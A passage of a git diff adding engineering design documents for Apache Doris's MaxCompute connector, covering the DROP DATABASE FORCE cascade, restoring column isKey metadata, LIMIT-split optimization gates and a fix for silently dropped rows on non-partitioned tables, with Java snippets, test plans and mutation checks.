each `dropTable`, (c) appends `"dropDb:"` on `dropDb`. Construct +`new MaxComputeConnectorMetadata(null /*odps*/, fake, "proj", "ep", "quota", emptyMap)` +(same offline pattern as `MaxComputeBuildTableDescriptorTest`). Call the 4-arg +`dropDatabase` directly. + +- **forceTrueCascadesAllTablesBeforeDroppingSchema** — fake `listTableNames` returns + `["t1","t2"]`; call `dropDatabase(session, "db1", false, true)`; assert the recorded + log equals `["dropTable:t1", "dropTable:t2", "dropDb:db1"]` (per-table drops, in order, + all BEFORE the schema delete). WHY (Rule 9): encodes the legacy parity requirement that + ODPS does NOT auto-cascade, so every table must be dropped first — the exact regression + DG-3 describes. MUTATION: removing the `if (force) { ...enumerate/dropTable... }` block + in `MaxComputeConnectorMetadata.dropDatabase` makes this red (log becomes just + `["dropDb:db1"]`). +- **forceFalseDoesNotEnumerateOrDropTables** — fake `listTableNames` returns + `["t1","t2"]` (would-be tables present); call `dropDatabase(session, "db1", false, + false)`; assert the log equals `["dropDb:db1"]` (no `dropTable`, no enumeration). WHY: + guards that non-FORCE never cascades — a regression in the other direction (always + cascading) would silently delete tables on a plain DROP DB. MUTATION: changing the gate + from `if (force)` to unconditional makes this red. +- **forceTrueOnEmptySchemaJustDropsDb** — fake `listTableNames` returns `[]`; call with + `force=true`; assert log equals `["dropDb:db1"]`. WHY: FORCE on an empty schema must + behave like a plain drop (no spurious table calls) — confirms the loop is a no-op when + there are no tables. +- **forceTrueSurfacesRemoteDropFailureAsConnectorException** — fake `dropTable` throws + `OdpsException` for `t2`; assert `dropDatabase(session,"db1",false,true)` throws + `DorisConnectorException` whose message contains `t2`, AND that `dropDb` was NOT + recorded (schema not deleted after a failed cascade). WHY (Rule 12, fail-loud): a + failing remote drop must not be swallowed and must abort before deleting the schema — + the opposite of the silent-degradation regression. MUTATION: swallowing the + `OdpsException` (catch+continue without rethrow) makes this red. + +## E2E Tests + +No new e2e file is strictly required for UT-level parity, but the standing truth-gate is +live ODPS (CI-skip). If an e2e suite is added it belongs under +`regression-test/suites/external_table_p2/maxcompute/` (mirroring existing MC suites): +- `test_mc_drop_db_force` — create a `max_compute` schema, create ≥2 tables, run + `DROP DATABASE FORCE`, assert it succeeds and the schema + tables are gone; + and that `DROP DATABASE ` (non-force) on a non-empty schema fails. CI-skip + (requires real ODPS credentials/quota); this is the only layer that proves ODPS + `schemas().delete()` truly rejects a non-empty schema, which the loop exists to avoid. diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-ISKEY-METADATA-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-ISKEY-METADATA-design.md new file mode 100644 index 00000000000000..836d7b29b5abf3 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-ISKEY-METADATA-design.md @@ -0,0 +1,158 @@ +# P4-T06e FIX-ISKEY-METADATA — Design + +> Issue: P3-10 / NG-6 / F3 / F10 (minor, read/metadata, regression). Source: +> `plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md` §NG-6. +> 用户定夺:**Fix(isKey=true,恢复 legacy parity)**(2026-06-08)。 + +## Problem + +After cutover, every MaxCompute column is marked `isKey=false`, so `DESCRIBE ` shows +`Key=NO`; legacy showed `Key=YES` for all columns. `DESCRIBE` is the path that genuinely reads the +catalog `Column.isKey()` — via `IndexSchemaProcNode.createResult` (`:92`). + +> **Scope correction (design-validation `wa9t0emta`):** `information_schema.columns.COLUMN_KEY` is +> **NOT** affected. `FrontendServiceImpl.describeTables` gates `desc.setColumnKey(...)` on +> `if (table instanceof OlapTable)` (`:962-965`); MaxCompute tables (legacy **and** cutover) extend +> `ExternalTable`, not `OlapTable`, so `COLUMN_KEY` is empty before and after the fix — already at +> legacy parity, out of scope. The regression and fix are **DESCRIBE-only.** + +This is **not purely cosmetic**, though the practical impact is small: besides DESCRIBE, a few +non-OLAP-guarded paths read `Column.isKey()` for external tables — `UnequalPredicateInfer` predicate +inference (`:278`) and the BE slot/column descriptors (`DescriptorToThriftConverter:67`, +`ColumnToThrift:59`). Legacy set `isKey=true` uniformly, so those paths always saw `true` in +production; the cutover's `isKey=false` silently changed them. The fix **restores the exact legacy +`isKey=true` value every planning/BE path already consumed** — so it is parity-correct and safe, and +closes a subtle planning divergence, not merely a display one. + +`MaxComputeConnectorMetadata.getTableSchema` (`:138` data, `:150` partition) builds +`ConnectorColumn`s with the **5-arg** constructor, whose `isKey` defaults to `false` +(`ConnectorColumn:35-38`). The converter `ConnectorColumnConverter.convertColumn` already threads +`cc.isKey()` into the Doris `Column` (`:65-70`), and `PluginDrivenExternalTable.initSchema` +(`:132,:146`) is what turns this into the external table's FE schema used by DESCRIBE / +information_schema. + +Legacy `MaxComputeExternalTable.initSchema` (`:177` data, `:189` partition) constructs each Doris +`Column(..., true /*isKey*/, ...)` → `isKey=true`. The `nullable` field already matches between +cutover and legacy (data = `col.isNullable()`; partition = `true`); **`isKey` is the only +divergence.** + +## Root Cause + +The connector port used the 5-arg `ConnectorColumn` ctor (isKey defaults false) and never set +`isKey=true`, dropping the legacy uniform `isKey=true` for external-table columns. + +## Design + +**Connector-local. No SPI change.** The converter already passes `isKey` through; only the two +construction sites need `isKey=true`. + +Extract a small package-private static helper (mirrors the repo's pure-static-helper testability +convention, e.g. `toPartitionSpecs` / `shouldUseLimitOptimization`), so the `isKey=true` invariant +is directly unit-testable without a live ODPS `Table` (which `getTableSchema` otherwise requires — +the connector module has no fe-core/Mockito): + +```java +/** + * Builds a {@link ConnectorColumn} for a MaxCompute external-table column. {@code isKey=true} + * mirrors legacy MaxComputeExternalTable.initSchema (every column was a Doris key column); for + * external (non-OLAP) tables the flag is display-only metadata (DESCRIBE Key / information_schema + * COLUMN_KEY), with no storage/aggregation semantics. + */ +static ConnectorColumn buildColumn(String name, ConnectorType type, String comment, + boolean nullable) { + return new ConnectorColumn(name, type, comment, nullable, null, true); +} +``` + +Replace the two loops: +```java +// data columns +columns.add(buildColumn(col.getName(), MCTypeMapping.toConnectorType(col.getTypeInfo()), + col.getComment(), col.isNullable())); +// partition columns +columns.add(buildColumn(partCol.getName(), MCTypeMapping.toConnectorType(partCol.getTypeInfo()), + partCol.getComment(), true)); +``` + +(Partition column `nullable=true` preserved verbatim — legacy parity, unchanged.) + +## Implementation Plan + +1. `MaxComputeConnectorMetadata.java`: add `buildColumn(...)` static helper; replace the two inline + `new ConnectorColumn(...)` (`:138`, `:150`) with `buildColumn(...)`. Import `ConnectorType` + (the helper's param type) if not already imported. +2. No other prod files (no SPI, no fe-core, no converter change). + +## Risk Analysis + +- **Blast radius:** one connector method; only MaxCompute reaches it. Restores **exact legacy + behavior** (`isKey=true` was production reality), so zero new risk. +- **Safety of `isKey=true` on external columns (validated by `wa9t0emta`):** every `isKey` branch + that could affect external-MC planning is either OLAP/Schema-guarded and unreachable for MC + (`BindRelation`, `OperativeColumnDerive` keysType, `StatisticsUtil` non-OlapTable early-return, + `getBaseSchemaKeyColumns` callers all OLAP-only), **or** non-guarded + (`UnequalPredicateInfer:278`, `DescriptorToThriftConverter:67`, `ColumnToThrift:59`) but **already + received `isKey=true` from legacy** — so the fix introduces zero new behavior vs pre-cutover + production. `buildColumn` uses the 6-arg ctor leaving `isAutoInc=false` (matches legacy); the + `InsertUtils` `isKey && isAutoInc` branches never fire. +- **Completeness (validated):** the MC connector has exactly **2** `ConnectorColumn` sites + (`:138`, `:150`), both in `getTableSchema`; `convertColumn` is the single FE conversion point + threading `isKey`; no BE-descriptor / scan-slot / partitions-TVF path surfaces the catalog + `isKey`. A **third** `ConnectorColumn` site exists downstream — + `PluginDrivenExternalTable.initSchema:139-140` rebuilds a *renamed* column (the lowercase + identifier-mapping path, which MC exercises via `fromRemoteColumnName`) via the 6-arg ctor + **threading `col.isKey()`**, so it **preserves** the `isKey=true` we set (no extra change needed). +- **Helper retention (vs inline `,true`×2):** the 6-arg ctor's `isKey=true` is already pinned + generically by `ConnectorColumnTest:63`, so `buildColumn` is a thin seam. Kept because (a) it + gives a mutation-killable assertion of the **MC-module** `isKey=true` decision (consistent with + the per-issue UT+mutation methodology), (b) it centralizes the decision across the 2 sites and + documents the legacy-parity intent (Rule 9). Cost: one static method + one `ConnectorType` import. + +## Test Plan + +### Unit (`MaxComputeConnectorMetadataIsKeyTest`, connector module — no fe-core/Mockito) + +`buildColumn` is pure static → exercise directly (no live ODPS `Table`). + +1. `buildColumn("c", ConnectorType.of("INT"), "cmt", true).isKey()` → **true** (kills the + `isKey true→false` mutation — the core regression guard). +2. Same call preserves `name` / `type` / `comment` / `nullable` and leaves `isAutoInc=false` + (non-vacuous: confirms the helper builds the column correctly, not just the key flag). +3. `buildColumn(..., false).isKey()` → still **true** and `nullable=false` (isKey independent of + nullable — guards against accidentally wiring isKey to the nullable arg). + +Add a Rule-9 "why" comment in the test class: it pins the `buildColumn` invariant; the +`getTableSchema → buildColumn` wiring is e2e-only because `com.aliyun.odps.Table` is unmockable in +this Mockito-free module. **Residual risk (acknowledged, `wa9t0emta` test-quality shouldFix):** the +unit test cannot catch a future call site that *bypasses* `buildColumn` (reverts to the 5-arg ctor, +re-introducing `Key=NO`); the **e2e DESCRIBE assertion is the load-bearing regression gate** for the +wiring. + +### Mutation + +- `buildColumn` `isKey=true` → `false` → test 1 red. + +### E2E (CI-skipped; live ODPS truth-gate — record as DV) + +`DESCRIBE ` shows `Key=YES` for MaxCompute columns (data + partition). Mirrors the +rereview's suggested regression assertion. **Note:** do **not** assert on +`information_schema.columns.COLUMN_KEY` — it is OlapTable-gated (`FrontendServiceImpl:962-965`) and +empty for MC regardless, already at legacy parity (see Problem). The `getTableSchema → DESCRIBE` +wiring is e2e-only because `getTableSchema` needs a live ODPS `Table` — same posture as DV-016. + +## Doc-sync (with commit) + +- `task-list-P4-rereview.md`: P3-10 row → DONE (+ round summary); RESUME → P3-11. +- `decisions-log.md`: D-033 — isKey=true restored (connector-local, no SPI). +- `deviations-log.md`: DV-017 — isKey=true unit-pinned via `buildColumn`; getTableSchema→DESCRIBE + wiring e2e-only (live truth-gate), same posture as DV-016. +- review-rounds: `plan-doc/reviews/P4-T06e-FIX-ISKEY-METADATA-review-rounds.md`. + +## Outcome ✅ DONE (commit `1b44cd4f065`) + +Implemented as designed (`buildColumn` helper + 2 call-site swaps in `MaxComputeConnectorMetadata`; +no SPI/fe-core change). Design-validation `wa9t0emta` 0 mustFix (folded in: DESCRIBE-only scope, +restores-legacy framing, 3rd-site note, helper rationale); impl-review `wrx0n11ol` 0 mustFix / +0 shouldFix (only a test-javadoc wording precision). Guards: build SUCCESS, **UT 3/3 (+37/37 +collateral)**, checkstyle 0, import-gate clean, mutation killed (`isKey true→false` → Failures 2). +Decision **D-033**; wiring-coverage + scope deviation **DV-017**. diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-design.md new file mode 100644 index 00000000000000..e02522cccc6177 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-design.md @@ -0,0 +1,248 @@ +# P4-T06e FIX-LIMIT-SPLIT-DEFAULT — Design + +> Issue: P3-9 / NG-5 / F11 (major, read, regression). Source: +> `plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md` §NG-5. +> Also closes the two related minors F2 / F12 (the `checkOnlyPartitionEquality` stub). +> 用户定夺:**Fix(恢复三重闸)**(2026-06-08)。 + +## Problem + +After cutover, MaxCompute's LIMIT-split optimization semantics are **reversed** vs legacy: + +`MaxComputeScanPlanProvider.planScan` (`:199-202`): +```java +boolean onlyPartitionEquality = filter.isPresent() + && checkOnlyPartitionEquality(filter.get(), partitionColumnNames); // STUB: always false +boolean useLimitOpt = limit > 0 && (onlyPartitionEquality || !filter.isPresent()); +``` +Because `checkOnlyPartitionEquality` is hard-stubbed to `false`, this reduces to +`useLimitOpt = limit > 0 && !filter.isPresent()`. Two regressions: + +1. **Session var ignored.** The gate never reads `enable_mc_limit_split_optimization` + (`SessionVariable.java:2891/2908`, registered `@VarAttr`, **default false**). So any + no-filter `SELECT … LIMIT n` is **always** compressed into a single row-offset split — + the opposite of legacy's default-OFF. For large `n` this serializes a read that legacy + parallelized (perf regression); it also silently overrides a user who set the var false. +2. **Partition-equality path dead.** With the stub at `false`, a `LIMIT n` query whose + filter is purely partition-column equality never gets the optimization even when the + user explicitly enabled the var. + +Legacy three-gate (`MaxComputeScanNode.java:735-737`), default OFF: +```java +if (sessionVariable.enableMcLimitSplitOptimization // (1) session var, default false + && onlyPartitionEqualityPredicate // (2) all conjuncts are partcol = lit / IN (lits) + && hasLimit()) { // (3) limit > 0 +``` +with `checkOnlyPartitionEqualityPredicate()` (`:334-375`): empty conjuncts → true; else every +conjunct must be `BinaryPredicate EQ` (`SlotRef(partcol) = LiteralExpr`) or non-NOT `InPredicate` +(`SlotRef(partcol) IN (LiteralExpr…)`); anything else → false. + +## Root Cause + +The connector port kept the *shape* of the legacy gate but dropped gate (1) entirely (the +session var was never threaded to the connector) and left gate (2) as a `return false` stub. +What the legacy gate did with `sessionVariable` + Doris `Expr conjuncts`, the connector must +now do with `ConnectorSession.getSessionProperties()` + the `ConnectorExpression filter`. + +## Design + +**Connector-local. No SPI change.** Both inputs are already available at `planScan`: + +- **Gate (1) — session var.** `ConnectorSession.getSessionProperties()` is populated for live + scans: `PluginDrivenExternalCatalog.buildConnectorSession()` → `ConnectorSessionBuilder.from(ctx)` + → `extractSessionProperties` → `VariableMgr.toMap(sessionVariable)`, which includes every + `@VarAttr`, so `"enable_mc_limit_split_optimization"` → `"true"/"false"` is readable. (Same + pattern the JDBC connector already uses for `jdbc_clickhouse_query_final`, + `enable_odbc_transcation`, etc. — the connector hardcodes the var-name string; it must not + depend on fe-core's `SessionVariable` constant, per import-gate.) +- **Gate (2) — only-partition-equality.** The `filter` passed to `planScan` is + `buildRemainingFilter()` → `ExprToConnectorExpressionConverter.convertConjuncts(...)`: + - empty conjuncts → `Optional.empty()` (handled by the `!filter.isPresent()` arm). + - 1 conjunct → the bare converted node. + - N conjuncts → a **flat** `ConnectorAnd` (count preserved; `convertConjuncts` never drops a + conjunct — unknown types become `ConnectorFunctionCall`). + - MaxCompute uses the **default** `supportsCastPredicatePushdown = true`, so `buildRemainingFilter` + takes the `else` branch and passes the **full** conjunct set (no whole-conjunct drops). Thus + `checkOnlyPartitionEquality(filter)` faithfully sees all conjuncts — equivalent to legacy + walking `conjuncts`. + +**Two pure static helpers (mirror the `toPartitionSpecs` test-as-pure-static convention):** + +```java +private static final String ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION = + "enable_mc_limit_split_optimization"; + +/** Gate (1): read the session var (default false). Map-typed for direct unit testing. */ +static boolean isLimitOptEnabled(Map sessionProperties) { + return Boolean.parseBoolean( + sessionProperties.getOrDefault(ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION, "false")); +} + +/** Composite eligibility: gate(1) && gate(3) && gate(2). Pure → directly unit testable. */ +static boolean shouldUseLimitOptimization(boolean limitOptEnabled, long limit, + Optional filter, Set partitionColumnNames) { + if (!limitOptEnabled || limit <= 0) { + return false; + } + if (!filter.isPresent()) { // no predicate → every row qualifies + return true; + } + return checkOnlyPartitionEquality(filter.get(), partitionColumnNames); +} +``` + +**Real `checkOnlyPartitionEquality` (replaces the stub; make `static` package-private):** + +```java +static boolean checkOnlyPartitionEquality(ConnectorExpression expr, + Set partitionColumnNames) { + if (expr instanceof ConnectorAnd) { + for (ConnectorExpression conjunct : ((ConnectorAnd) expr).getConjuncts()) { + if (!isPartitionEqualityLeaf(conjunct, partitionColumnNames)) { + return false; + } + } + return true; + } + return isPartitionEqualityLeaf(expr, partitionColumnNames); +} + +private static boolean isPartitionEqualityLeaf(ConnectorExpression expr, + Set partitionColumnNames) { + // partcol = literal (mirror legacy: col on the LEFT, literal on the RIGHT, EQ only) + if (expr instanceof ConnectorComparison) { + ConnectorComparison cmp = (ConnectorComparison) expr; + if (cmp.getOperator() != ConnectorComparison.Operator.EQ) { + return false; + } + return isPartitionColumnRef(cmp.getLeft(), partitionColumnNames) + && cmp.getRight() instanceof ConnectorLiteral; + } + // partcol IN (literal, …) (not NOT-IN; all elements literal) + if (expr instanceof ConnectorIn) { + ConnectorIn in = (ConnectorIn) expr; + if (in.isNegated() || !isPartitionColumnRef(in.getValue(), partitionColumnNames)) { + return false; + } + for (ConnectorExpression item : in.getInList()) { + if (!(item instanceof ConnectorLiteral)) { + return false; + } + } + return true; + } + return false; +} + +private static boolean isPartitionColumnRef(ConnectorExpression expr, + Set partitionColumnNames) { + return expr instanceof ConnectorColumnRef + && partitionColumnNames.contains(((ConnectorColumnRef) expr).getColumnName()); +} +``` + +**Wire into `planScan` (`:199-202`):** +```java +boolean limitOptEnabled = isLimitOptEnabled(session.getSessionProperties()); +boolean useLimitOpt = shouldUseLimitOptimization( + limitOptEnabled, limit, filter, partitionColumnNames); +``` + +Net gate: `enableVar && limit>0 && (noFilter || onlyPartitionEquality)` — byte-faithful to +legacy's `enableMcLimitSplitOptimization && onlyPartitionEqualityPredicate && hasLimit()` +(legacy's `onlyPartitionEqualityPredicate` is `true` for empty conjuncts, matching `noFilter`). + +## Implementation Plan + +1. `MaxComputeScanPlanProvider.java`: + - add `ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION` constant + `isLimitOptEnabled` + `shouldUseLimitOptimization` (static) + real `checkOnlyPartitionEquality` (static, package-private) + `isPartitionEqualityLeaf` / `isPartitionColumnRef` (private static). + - replace the `:199-202` block with the two-line wiring above. + - imports: `ConnectorAnd`, `ConnectorComparison`, `ConnectorIn`, `ConnectorColumnRef`, `ConnectorLiteral` (all `org.apache.doris.connector.api.pushdown.*`); `java.util.Map` already imported. +2. No other prod files (no SPI, no fe-core). + +## Risk Analysis + +- **Blast radius:** single connector method; only MaxCompute reaches it. Default var stays + **false** → default behavior reverts to legacy (no limit-opt unless explicitly enabled), + which is the conservative direction. Zero impact on other connectors. +- **Correctness:** limit-opt now fires only when (var on) AND (no filter OR pure partition + equality). In both predicate cases every row in the (pruned) partitions qualifies, so reading + the first `min(limit,total)` rows by offset is correct (LIMIT w/o ORDER BY is order-free). +- **Known divergence (minor, note as DV):** `convert(CastExpr)` unwraps the cast **in every + position**, so `CAST(partcol AS T) = lit`, `partcol = CAST(lit AS T)`, and + `partcol IN (CAST(lit AS T), …)` all reach the connector with the cast stripped and pass + gate (2); legacy's `checkOnlyPartitionEqualityPredicate` saw the raw `CastExpr` child (failing + its `instanceof SlotRef` / `instanceof LiteralExpr` checks) and returned false. Cutover + therefore enables the opt on a slightly **broader** set — but it is still pure-partition and + correctness-safe (the converted `filterPredicate` is still passed to the read session as a + backstop on both the standard and limit-opt paths — `MaxComputeScanPlanProvider :191,:208,:353` + — and partition pruning is computed identically via Nereids `SelectedPartitions`; LIMIT w/o + ORDER BY is order-free). Opt-in only (var default OFF). Register in deviations-log. + (Validated by design-review workflow `w17wzd0el`, correctness-lostrows + legacy-parity lenses.) +- **Interaction:** orthogonal to FIX-PRUNE-PUSHDOWN (P1-4). `requiredPartitions` continues to + flow to both the limit-opt and standard read-session paths unchanged. + +## Test Plan + +### Unit Tests (`MaxComputeScanPlanProviderTest`, connector module — no fe-core/Mockito) + +`checkOnlyPartitionEquality` / `shouldUseLimitOptimization` / `isLimitOptEnabled` are pure +static; exercise directly. `partitionColumnNames = {"pt","region"}`. + +1. `isLimitOptEnabled`: empty map → false; `{k="true"}` → true; `{k="false"}` → false. (kills default-literal + parse mutations). **Build the map with the literal key `"enable_mc_limit_split_optimization"`, NOT the prod constant** — matches the JDBC test convention (`JdbcConnectorMetadataTest`) so a prod-side typo in the constant value is caught (review `w17wzd0el` test-mutation nit). +2. `shouldUseLimitOptimization` gate (1): `limitOptEnabled=false` → false even with limit>0 & no filter. (kills dropping the `!limitOptEnabled` guard) +3. gate (3): `limitOptEnabled=true, limit=0` → false. (kills `limit<=0` guard) +4. no-filter arm: `enabled, limit=10, Optional.empty()` → true. +5. partition equality single: `pt = 1` → `checkOnlyPartitionEquality` true → eligible. +6. partition IN: `region IN ('cn','us')` → true. +7. `ConnectorAnd` all partition eq: `pt=1 AND region='cn'` → true. +8. mixed: `pt=1 AND data_col=5` → false (data_col not partition). (kills the AND short-circuit) +9. data-col equality: `data_col = 5` → false. +10. non-EQ on partition col: `pt > 1` → false. (kills the `op==EQ` guard) +11. NOT IN on partition col: `pt NOT IN (1,2)` → false. (kills the `!negated` guard) +12. IN with non-literal element on partition col → false. +13. literal-on-left `1 = pt` → false (mirror legacy col-on-left only). (kills swapping left/right) +14. **partcol = partcol** `pt = region` (col on BOTH sides) → false. Reaches the RHS check (left is a valid partition col-ref) and fails on `right instanceof ConnectorLiteral`. (kills dropping `&& getRight() instanceof ConnectorLiteral` — review `w17wzd0el` shouldFix: without this, `pt = region` / `pt = func(...)` would be wrongly eligible, mirroring legacy `MaxComputeScanNode:346` requiring `child(1) instanceof LiteralExpr`) + +### Mutation (cp-backup the prod file; per HANDOFF operational notes) + +- `isLimitOptEnabled` default `"false"`→`"true"` → test 1 (empty map) red. +- drop `!limitOptEnabled` in `shouldUseLimitOptimization` → test 2 red. +- drop `limit <= 0` → test 3 red. +- `op == EQ` → `!=` / remove → test 10 red. +- `!negated` removal → test 11 red. +- AND-loop `return false`→`continue`/`true` → test 8 red. +- drop `&& getRight() instanceof ConnectorLiteral` → test 14 red. + +**Coverage gap (inherent, acknowledge — review `w17wzd0el` test-mutation nit):** the two replaced +wiring lines in `planScan` (`isLimitOptEnabled(session.getSessionProperties())` + +`shouldUseLimitOptimization(...)` receiving the live `filter`/`partitionColumnNames`) cannot be +unit-tested in the connector module — `planScan` needs a live `com.aliyun.odps.Table` and there is +no fe-core/Mockito. The pure helpers are fully covered; the integration seam is guarded only by the +CI-skipped live E2E below (record as the DV truth-gate, same posture as P1-4 DV-015). + +### E2E (CI-skipped; live ODPS truth-gate — record as DV, not run here) + +`regression-test` p2 `test_max_compute_limit_*` (or extend an existing MC suite): +- var OFF (default): `SELECT * FROM mc_t LIMIT 1000000` → EXPLAIN/profile shows multi-split + parallel scan (no row-offset single split). +- var ON + partition-eq filter + LIMIT → single row-offset split. +- var ON + no filter + LIMIT → single row-offset split. + +## Doc-sync (with commit) + +- `task-list-P4-rereview.md`: P3-9 row → DONE (+ round summary); RESUME → P3-10. +- `deviations-log.md`: DV — CAST-unwrap broadens limit-opt eligibility (opt-in, safe); + note F2/F12 closed by the real `checkOnlyPartitionEquality`. +- `decisions-log.md`: D — limit-opt restored as connector-local three-gate via + `getSessionProperties()` (no SPI change). +- review-rounds file: `plan-doc/reviews/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-review-rounds.md`. + +## Outcome ✅ DONE (commit `952b08e0cc8`) + +Implemented as designed (1 prod file `MaxComputeScanPlanProvider` + tests; no SPI/fe-core change). +Design-validation workflow `w17wzd0el` 0 mustFix; impl-review workflow `walkff1vf` 1 mustFix +(IN-value guard lacked a killing test — added `testInValueDataColumnIneligible` + mutation G; +**no prod change**, the code was already correct). Guards: build SUCCESS, **UT 26/26**, checkstyle 0, +import-gate clean, mutation 8/8 killed + final green. Also closes minors **F2/F12**. Divergences +(CAST-unwrap, nested-AND, LIMIT-0 path, wiring-unit-test gap) recorded in **DV-016**; decision **D-032**. diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-design.md new file mode 100644 index 00000000000000..d617fb68fe8016 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-design.md @@ -0,0 +1,91 @@ +# [P4-T06e] FIX-NONPART-PRUNE-DATALOSS (GAP8) — design + +> 来源:Batch-D 红线扩充对抗复审 workflow `wbw4xszrg`(schema-table unit)。用户定 **Fix now,repro-test 先行**。 +> 关联 auto-memory:[[catalog-spi-nonpartitioned-prune-dataloss]]。 + +## Problem + +翻闸后,对**非分区** max_compute 表执行带 WHERE 的查询静默返回 **0 行**: + +```sql +SELECT * FROM mc_catalog.db.non_partitioned_tbl WHERE col > 5; -- 0 行(错!应返回匹配行) +SELECT * FROM mc_catalog.db.non_partitioned_tbl; -- 正常(无 WHERE,规则不触发) +``` + +行正确性回归(静默丢行),非性能问题。仅影响走 `LogicalFileScan` + `PluginDrivenScanNode` 的插件表——当前=MaxCompute(翻闸后唯一 live 的 PluginDriven 文件扫描连接器)。 + +## Root Cause(已 5 处核码确认) + +| # | 位置 | 行为 | +|---|---|---| +| 1 | `PluginDrivenExternalTable.supportInternalPartitionPruned()` :205-212 | 返 `!getPartitionColumns().isEmpty()` → **非分区表 = false**。注释「observably equivalent to true(initSelectedPartitions returns NOT_PRUNED either way)」**只对了 init 一半**。 | +| 2 | `ExternalTable.initSelectedPartitions()` :440 | `!supportInternalPartitionPruned()` → 初始 `NOT_PRUNED`(isPruned=false)。故 `PruneFileScanPartition` 的 `whenNot(isPruned)` 放行,**规则会触发**(有 filter 时)。 | +| 3 | `PruneFileScanPartition.build()` :64-69 | 触发后 `if (supportInternalPartitionPruned())` = **false → else 支** 覆写 `selectedPartitions = new SelectedPartitions(0, ImmutableMap.of(), true)`(isPruned=**true**,空 map)。 | +| 4 | `PhysicalPlanTranslator.visitPhysicalFileScan()` :761 | 对每个 PluginDriven scan **无条件** `setSelectedPartitions(fileScan.getSelectedPartitions())`。 | +| 5 | `PluginDrivenScanNode.resolveRequiredPartitions()` :172-176 + `getSplits()` :409-412 | isPruned=true + 空 map → 返**空 list(非 null)**;`getSplits`:`requiredPartitions != null && isEmpty()` → `Collections.emptyList()` → **0 split → 0 行**。 | + +**两 commit 叠加**: +- 坏 override 来自 `35cfa50f988 [P4-T06d] FIX-PART-GATES`——当时 **dormant**(彼时 `getSplits` 不读 selectedPartitions,isPruned=true+空 无害)。 +- `072cd545c54 [P4-T06e] P1-4 FIX-PRUNE-PUSHDOWN` 加的「isPruned+空 → 0 split 短路」**激活**了 dormant 坑。短路本意是「分区表裁剪到 0 分区」(如 `WHERE pt='不存在'`),未料**非分区**表也落 isPruned=true+空。 + +**为何 CI 没抓**: +- 单测 `PluginDrivenScanNodePartitionPruningTest:97` 只钉静态 helper(`emptyPruned → 空 list`)= **钉住了错的不变式**(违 Rule 9:测试无法在业务逻辑错时失败)。 +- live e2e `test_max_compute_partition_prune.groovy` 只测**分区**表;非分区+WHERE 无覆盖。 +- 仅 MaxCompute 走 `PluginDrivenScanNode`(jdbc/es/trino 非 PluginDrivenExternalTable、不产 LogicalFileScan),故未在别处暴露。 + +## Blast radius(已核 + 设计验证 `wijd3qgk0` 更正) + +- **无类 extends PluginDrivenExternalTable**(grep 0 hit)——override 仅 `PluginDrivenExternalTable` 实例命中。 +- ⚠️ **更正原稿「仅 MaxCompute / 注释 aspirational」**:`CatalogFactory.SPI_READY_TYPES = {jdbc, es, trino-connector, max_compute}`(:51-52),这 4 类**任一**连接器 provider 加载时即建 `PluginDrivenExternalCatalog` → 表为 `PluginDrivenExternalTable`(TableType `PLUGIN_EXTERNAL_TABLE`)→ `BindRelation:543-544` 产 `LogicalFileScan` → `PhysicalPlanTranslator:753` 路由 `PluginDrivenScanNode`(**首匹配**)。故本 override + 本 bug 是**通用插件层**问题,**非 MaxCompute 专有**:任何非分区 SPI 驱动表 + WHERE 都会 0 行。**当前仅 MaxCompute 被翻闸/加载暴露**(jdbc/es 在本分支多半未加载 SPI provider,走降级/legacy 故未现)。Option A 对全部 4 类**中性或有益、绝不有害**(非分区 → pruneExternalPartitions 返 NOT_PRUNED → 扫全表)。 +- `PruneFileScanPartition` 只匹配 `logicalFileScan()`;HMS/Iceberg/LakeSoul/RemoteDoris 各有**自己**的 `supportInternalPartitionPruned`,不受本 override 影响。 +- **MV-path consumer(已核 benign=parity 恢复)**:改 true 后非分区 PluginDriven 表在 `QueryPartitionCollector:75` 从 ELSE(ALL_PARTITIONS) 转 `else-if`(读空 NOT_PRUNED map 的 keySet=空集,无 NPE),`PartitionCompensator:246` 不再 early-return false。**安全**——legacy `MaxComputeExternalTable:83-84` 即无条件 true(`IcebergExternalTable` 同),翻闸前非分区 MC MV 基表本就走这些 true 分支 ⇒ **恢复 legacy parity,非新回归**(`PartitionCompensator:84` 另对 UNPARTITIONED MV early-return,进一步限暴露)。 + +## Design + +**Option A(选用)— `PluginDrivenExternalTable.supportInternalPartitionPruned()` 返无条件 `true`**,镜像 legacy `MaxComputeExternalTable.supportInternalPartitionPruned()`(:82-85 返 true)。 + +为何安全且正确: +- 非分区:`PruneFileScanPartition` 走 `if` 支 → `pruneExternalPartitions()` :78 见 `getPartitionColumns().isEmpty()` → **返 `NOT_PRUNED`**(isPruned=false)→ `resolveRequiredPartitions` 返 null → 扫全表。✅ 修复。 +- 分区:true vs `!isEmpty()`=true → **零变化**(既有路径不动)。 +- `initSelectedPartitions` :443 对空分区列也返 `NOT_PRUNED`,与现状一致(init 不变)。 +- 这是与 legacy `MaxComputeExternalTable` 的**最忠实 parity**(legacy 即无条件 true)。 + +**Defensive guard(设计验证定夺:不纳入)**:legacy `MaxComputeScanNode.getSplits():720` 另有 `!getPartitionColumns().isEmpty() && != NOT_PRUNED` 守卫(legacy 双保险),翻闸时该 consumer 侧守卫被丢、未由 Option A 恢复。但设计验证 Lens-4 确认:Option A 在**源头**修复(规则不再对非分区 PluginDriven 表产 isPruned=true+空),故 consumer 守卫**对正确性冗余**。`PluginDrivenScanNode.getSplits:409-412` 短路确「盲信」不变式(isPruned+空 只来自分区表裁剪到 0),但该不变式现由 Option A 维护、且与 `PluginDrivenScanNode:486-489` 